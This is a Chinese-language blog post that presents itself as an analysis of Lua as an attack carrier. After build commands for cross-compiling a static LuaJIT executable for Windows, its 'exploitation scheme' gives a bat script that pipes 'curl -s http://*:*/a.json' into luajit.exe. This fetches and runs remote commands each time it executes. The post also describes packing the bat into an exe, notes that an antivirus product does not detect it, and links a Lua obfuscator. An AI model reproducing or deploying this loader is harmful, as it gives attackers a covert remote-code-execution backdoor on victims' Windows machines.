我的博客希望您能为我的博客增添一点热量DeepWave本篇文章Lua攻击载体分析类似的载体攻击Windows | 利用Lua加载StealC v2窃密攻击活动分析致命分身 | FakeGit 伪造开源生态投毒活动追踪GitHub托管的SmartLoader——伪装成合法项目感染用户PoetRAT针对阿塞拜疆公共和私营部门的恶意软件不断演变Redline Stealer一种新颖的方法Notepad供应链攻击——未被察觉的执行链和新型入侵指标LuaJIT从github下载并编译直接在根目录使用make编译Luajit我是在Linux系统上交叉编译成windows的exe以下示例均是Linux编译示例# 安装编译工具链aptinstallmingw-w64 mingw-w64-tools# 交叉编译在项目的目录里makeHOST_CCgcc\CROSSx86_64-w64-mingw32-\TARGET_SYSWindows\BUILDMODEstatic\TARGET_DYNLIBS\STATIC_CCx86_64-w64-mingw32-gcc -static\TARGET_LDFLAGS-static -Wl,-Bstatic -Wl,--whole-archive -static-libgcc -static-libstdc -Wl,--no-whole-archive\CROSS_CFLAGS-static -fno-use-cxa-atexit# 检查 DLL 依赖x86_64-w64-mingw32-objdump-psrc/luajit.exe|grepDLL Name# 理想输出应该只有# DLL Name: KERNEL32.dll# 不应该有lua51.dll 等# msvcrt.dll 是 Windows 的 C 运行时库几乎所有 Windows 2000 后系统都自带。放到 Windows 运行# 命令行运行 luajit.exe a.txt # 不一定是文本txt是个文件就行 a.md a a.c a.h 等等利用方案方案一本地主动连接使用bat脚本curl -s http://*:*/a.json | luajit.exe -这样每次执行就访问http://*:*/a.json一次通过修改a.json文件执行命令将bat打包成exeluajit.exe和bat脚本放在同一个项目里火绒无报毒其他#lua混淆 https://wearedevs.net/obfuscator #反混淆 https://github.com/0x251/Prometheus-Deobfuscator